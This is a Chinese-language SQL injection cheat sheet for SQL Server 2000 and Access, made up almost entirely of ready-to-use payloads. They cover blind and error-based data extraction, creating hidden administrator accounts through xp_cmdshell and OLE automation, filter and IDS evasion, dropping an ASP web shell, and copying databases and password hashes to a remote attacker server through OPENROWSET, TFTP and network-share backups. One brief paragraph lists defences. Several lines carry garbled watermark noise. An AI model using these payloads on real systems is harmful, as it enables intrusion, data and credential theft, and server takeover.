1. 判断有无注入点
分别提交 and 1=1 和 and 1=2:前者页面正常、后者页面异常,说明参数被直接拼进了 SQL(数字型注入);字符型参数要先闭合引号,如 ' and '1'='1 。
(说明:下文记录的是 SQL Server 2000 / Access 时代的手法,大多依赖 sa 级别的连接账号、默认开启的 xp_cmdshell / OLE 自动化和 openrowset 远程查询。对应的防御就是参数化查询、最小权限的数据库账号、关闭这些扩展存储过程,并限制数据库服务器的出站连接。)
2. 猜表名。一般的表名无非是 admin、adminuser、user、pass、password 等。
and 0<>(select count(*) from *)        -- 模板,把 * 换成要猜的表名
and 0<>(select count(*) from admin)    -- 返回正常说明存在 admin 这张表,报错则不存在

3. 猜帐号数目。如果 0< 返回正确页面、1< 返回错误页面,说明帐号数目就是 1 个。
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
猜列名还可以用 and (select count(列名) from 表名)>0 ,列名不存在时报错。
4. 猜解字段名称。在 len( ) 括号里填上猜测的字段名,字段不存在时报错。
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(name)>0)        -- 猜用户名字段,这里假设叫 name
and 1=(select count(*) from admin where len(password)>0)    -- 猜密码字段,这里假设叫 password
注意:1=(select count(*) ...) 这种写法默认 admin 表里只有一行;多行时请改用下面的 top 1 写法。
5. 猜解各个字段的长度。把 >0 里的数字逐步改变,直到返回正确页面为止。
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)        -- 错误
and 1=(select count(*) from admin where len(name)>5)        -- 正确,长度是 6
and 1=(select count(*) from admin where len(name)=6)        -- 正确

and 1=(select count(*) from admin where len(password)>11)   -- 正确
and 1=(select count(*) from admin where len(password)>12)   -- 错误,长度是 12
and 1=(select count(*) from admin where len(password)=12)   -- 正确
猜长度还可以用 and (select top 1 len(username) from admin)>5 ,这种写法不依赖表中只有一行。
6. 猜解字符
and 1=(select count(*) from admin where left(name,1)='a')    -- 猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)='ab')   -- 猜解用户帐号的前两位
就这样一次加一个字符地猜,猜到上一步得到的长度为止,帐号就出来了。
猜内容还可以按字符编码逐位比较: and (select top 1 asc(mid(password,1,1)) from admin)>50
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51)--
用大于/小于做二分比较,比逐个枚举字符快得多。这种写法同样可以猜解中文的用户名和密码,只要把后面的数字换成对应的编码值,最后再把结果转回字符即可。注意 asc()/mid() 是 Access(Jet)的函数,MSSQL 里对应的是 ascii()/substring()。
group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
利用 GROUP BY / HAVING 的报错逐个暴出列名:每次把错误信息里提示"不在 group by 中"的那一列加进 group by,直到不再报错,表的列就全出来了。
; insert into users values( 666, 'attacker', 'foobar', 0xffff )--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id')--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id','login_name')--
UNION SELECT TOP 1 login_name FROM logintable--
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--
(原文第二、三条写了两个 WHERE,应为 WHERE ... AND ...。UNION 写法要求列数、类型与原查询一致;列数未知时可以改成 and 1=(select top 1 ...) 的报错方式,字符串转整数失败时错误信息里会直接带出值。)
查看服务器版本和补丁级别:
and 1=(select @@VERSION)--
把 @@VERSION 这个字符串和整数 1 比较会触发类型转换错误,错误信息里带出完整的版本字符串(含 SP 级别),由此可知有没有打 SP4 之类的补丁。
查看数据库连接账号的权限。返回正常,说明连接账号属于服务器角色 sysadmin:
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--
判断连接数据库的帐号(返回正常即说明连接账号是 sa):
and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name())--    -- 与整数比较报错,错误信息里带出当前数据库用户名
查看 xp_cmdshell 是否被删除(xtype='X' 表示扩展存储过程):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='X' AND name='xp_cmdshell')--
xp_cmdshell 被删除后可以用 sp_addextendedproc 恢复(需要 sysadmin),也支持绝对路径;如果 xplog70.dll 本身也被删了,就要先把它传上去:
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--
(SQL Server 2005 及以后 xp_cmdshell 默认是关闭而不是删除,这两条恢复语句不适用。)
反向 ping 自己做实验(在自己机器上抓 ICMP 包,验证能否通过 OLE 自动化执行命令):
;use master;declare @s int;exec sp_oacreate 'wscript.shell',@s out;exec sp_oamethod @s,'run',NULL,'cmd.exe /c ping 192.168.0.1';--
加系统帐号(sp_oacreate 一般要求 sysadmin 权限):
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--
创建一个指向 E 盘的虚拟目录(mkwebdir.vbs、chaccess.vbs 是 IIS 自带的管理脚本):
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"'--

设置访问属性(配合写入一个 webshell):
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'--
MSSQL 也可以用联合查询:
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin   (union 在 Access 里也好用)
数字 1..13 只是占位,占位列数加上 * 展开的列数要等于原查询的列数;id=-1 保证原查询不返回行,页面上显示的就是 union 部分的数据。
爆库特殊技巧:把 URL 里最后一个 / 换成 %5c(即 \),或者只提交 %5,让 Jet 引擎解析路径失败而报错,错误信息里会带出 Access 数据库的物理路径。
得到 WEB 路径:
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--     -- 字符和整数比较报错,错误信息里带出 swappass 的值
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(500) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', @value=@test OUTPUT insert into newtable(paths) values(@test)--
(原文此处写成 values=@test 并 insert into paths(path),与前面建的 newtable(paths) 对不上,已改正;@test 也要够长,否则路径被截断。)
;use ku1;--
;create table cmd (str image);--     -- 建立 image 类型的表 cmd
存在 xp_cmdshell 时的测试过程:
;exec master..xp_cmdshell 'dir'
;exec master.dbo.sp_addlogin 'jiaoniang$';--                              -- 加 SQL 帐号
;exec master.dbo.sp_password null,'1866574','jiaoniang$';--               -- 参数顺序是 旧口令,新口令,登录名(原文把后两个写反了)
;exec master.dbo.sp_addsrvrolemember 'jiaoniang$','sysadmin';--
;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';--
exec master..xp_servicecontrol 'start','schedule'      -- 启动计划任务服务
exec master..xp_servicecontrol 'start','server'        -- 启动 Server 服务
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add'
;exec master..xp_cmdshell 'tftp -i youip get file.exe'--     -- 利用 TFTP 上传文件(目标要能出站访问你的 UDP 69 端口)
用变量拼接存储过程名,绕过对 xp_cmdshell 字样的过滤:
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
;declare @a sysname;set @a=db_name();backup database @a to disk='\\你的IP\你的共享目录\bak.dat'
如果注入点不允许堆叠语句或上述方法被限制,可以用 openrowset 回连本机,借 sa 账号再执行命令(例子里 sa 是空口令):
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'';exec master.dbo.sp_addlogin hax')
查询构造:
SELECT * FROM news WHERE id=... AND topic=... AND .....
在用户名字段注入的例子(结尾的 userpass <> ' 用来闭合程序原有的引号):
admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <> '
select 123;--
;use master;--
' or name like 'fff%';--          -- 显示有一个叫 ffff 的用户
and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
;update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
;update [users] set email=(select top 1 count(id) from password) where name='ffff';--
;update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--
;update [users] set email=(select top 1 name from password where id=2) where name='ffff';--
上面第一条 update 把数据库中第一个用户表的表名写进 ffff 用户的邮箱字段,查看 ffff 的用户资料即可得到第一个用户表叫 ad。
然后用表名 ad 查出它的 id,再用 id> 这个值 取得第二个表的名字,依此类推;后面几条同样把 password 表的行数和内容写进邮箱字段读出来。
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--   -- 用 char() 拼出 'chris',绕过对单引号的过滤
insert into users values( 667,'123','123',0xffff)--
insert into users values ( 123, 'admin--', 'password', 0xffff)--
and user>0                                        -- user 与整数比较报错,错误信息里带出当前数据库用户名
and (select count(*) from sysobjects)>0           -- 返回正常说明是 MSSQL
and (select count(*) from msysobjects)>0          -- 返回正常(或报权限错误)说明是 Access 数据库(系统表名是 MSysObjects)
枚举出数据表名:
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--
这是将第一个表名更新到 aaa 表的 aaa 字段处。
读出第一个表后,第二个表可以这样读出来(在条件后加上 and name<>'刚才得到的表名'):
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--
然后提交 id=1552 and exists(select * from aaa where aaa>5) ,varchar 和整数比较触发转换错误,错误信息里带出 aaa 的值。
就这样一个个地读出第二个、第三个表,直到没有为止。
读字段是这样:
;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));--
然后 id=152 and exists(select * from aaa where aaa>5) 出错,得到第 1 个字段名
;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));--
然后 id=152 and exists(select * from aaa where aaa>5) 出错,得到第 2 个字段名

[获得数据表名] 将某个字段值更新为表名,再想法读出这个字段的值就可得到表名:
update 表名 set 字段=(select top 1 name from sysobjects where xtype='u' and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条件]
也可以写成 select top 1 name from sysobjects where xtype='u' and status>0 and name not in('table1','table2',…)
通过 SQL Server 注入漏洞建立数据库管理员帐号和系统管理员帐号[当前连接帐号必须属于 sysadmin 角色](即前面 jiaoniang$ 那一段的语句)
[获得数据表字段名] 将字段值更新为字段名,再想法读出这个字段的值就可得到字段名:
update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段序号,如 1)) [ where 条件]

绕过 IDS 检测[使用变量拼接存储过程名]:
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
1、 开启远程数据库
基本语法:
select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1')
参数:(1) OLE DB Provider 名称 (2) 连接字符串 (3) 在远程服务器上执行的查询
2、 连接字符串里可以指定任意端口,比如
select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from table')
' `) c4 S4 H* d" y0 w3 ^3.复制目标主机的整个数据库insert所有远程表到本地表。 : R6 J% {* C& g4 g& N I9 J
/ Y6 X0 A! T& V: N# q- J3 ~2 P基本语法: : @- W6 `8 q( ]# d6 R
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
0 M. O( m7 k6 L" d6 R这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如: % F" z8 p' v% f% G6 Z) b
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 + D5 y, }) _( |* T
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases) p5 P5 \0 \) j* l! ?/ @
select * from master.dbo.sysdatabases
* s1 a8 ~: A% Y1 {0 q) B( Kinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
5 s; t, Q6 [! hselect * from user_database.dbo.sysobjects & e" i- Y: k0 Y0 ~! z5 n2 o; G
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
1 M& a) x/ s) Q* y- T# _# o* Q. Pselect * from user_database.dbo.syscolumns 4 f" _( N4 Z+ B+ u
复制数据库:
?0 _ B! [; \ A8 M' N4 rinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 # s R3 \; b/ \$ F0 V- l( i ?
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
0 W( Z7 Q, e: B, P& s( r& N. S" T I+ B8 j
复制登录口令的哈希(HASH):SQL Server 2000 的登录密码 hash 存储在 master 库的 sysxlogins 表中。方法如下:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysxlogins') select * from master.dbo.sysxlogins
得到 hash 之后,就可以离线暴力破解。
遍历目录的方法:先创建一个临时表 temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;--                    -- 获得当前所有驱动器(返回 4 列,正好对应 temp 的 4 个字段)
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--            -- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--       -- 获得所有子目录的目录树结构,并存入 temp 表中
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--   -- 查看某个文件的内容
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\*.asp /s/a';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc';--
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--       (xp_dirtree 的执行权限是 PUBLIC,不需要 sysadmin)
判断连接账号属于哪些服务器角色(返回正常即属于该角色):
语句1:and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
语句2:and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
语句3:and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
语句4:and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
语句5:and 1=(SELECT IS_SRVROLEMEMBER('processadmin'));--      (原文此处重复了 securityadmin)
语句6:and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
语句7:and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
语句8:and 1=(SELECT IS_SRVROLEMEMBER('dbcreator'));--          (原文此处重复了 bulkadmin)
语句9:and 1=(SELECT IS_MEMBER('db_owner'));--                  -- 当前数据库角色
把路径写到表中去:
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree 'c:\'--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in('Inetpub'))--     -- 每读出一个目录名就加进 not in,读下一个
;create table dirs1(paths varchar(100), id int)--
;insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--     (原文误写成 insert dirs)
and 0<>(select top 1 paths from dirs1)--
把数据库备份到网页目录,然后直接下载(SQL Server 服务账号要对该目录有写权限):
;declare @a sysname; set @a=db_name();backup database @a to disk='e:\web\down.bak';--
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)   -- char(85)='U';取第 12 个用户表的名字,改 top N 逐个读
and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects)   -- 查看相关表的第 1 个字段名
and 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)
-=- wscript.shell example -=-
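-- wscript.shell example: launch a process through SQL Server OLE Automation.
-- sp_oacreate / sp_oamethod normally require the sysadmin role (and OLE
-- Automation enabled), so this only works once the injected login has it.
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'

-- The same thing as one stacked statement for an injection point:
; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--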
1 x, ` Y' [0 o+ v' j! J' x b' f9 L( y8 d! W9 Y
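-- Read a file line by line through Scripting.FileSystemObject and print it.
-- (The unused @t from the original declaration is dropped.)
declare @o int, @f int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
-- OpenTextFile(path, 1): mode 1 = ForReading
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
-- sp_oamethod returns non-zero once ReadLine fails (end of file), which ends the loop
while( @ret = 0 )
begin
    print @line
    exec @ret = sp_oamethod @f, 'readline', @line out
end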
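-- Drop a one-line ASP web shell with FileSystemObject.CreateTextFile.
-- The page runs whatever arrives in ?cmd= through wscript.shell, so it executes
-- as the IIS worker account, not the SQL Server account. The trailing 1 to
-- CreateTextFile means "overwrite if the file exists".
declare @o int, @f int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
    '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'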
- u# _- R5 z3 q) R: S) P/ ^! ]- H+ N4 t' ~1 `5 @2 s
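-- speech.voicetext example: make the server talk through the SAPI COM object.
-- Harmless demo of OLE Automation; same prerequisites as wscript.shell above.
declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528
-- keep the batch (and the COM object) alive long enough for the speech to finish
waitfor delay '00:00:05'

-- Single-statement form for an injection point:
; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'--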
" s# N' p! C1 @5 N% c
xp_dirtree 的执行权限是 PUBLIC(不需要 sysadmin):
exec master.dbo.xp_dirtree 'c:\' 返回的结果有两个字段 subdirectory、depth。subdirectory 字段是字符型,depth 字段是整型。
create table dirs(paths varchar(100), id int)
建表,这里建的表要和上面 xp_dirtree 的返回结果相对应:字段个数相等、类型兼容。
insert dirs exec master.dbo.xp_dirtree 'c:\'
只要我们建的表与存储过程返回的字段定义一致,insert ... exec 就能执行,达到把结果写入表的效果;再用前面的报错或盲注手法把表里的信息一步步读出来。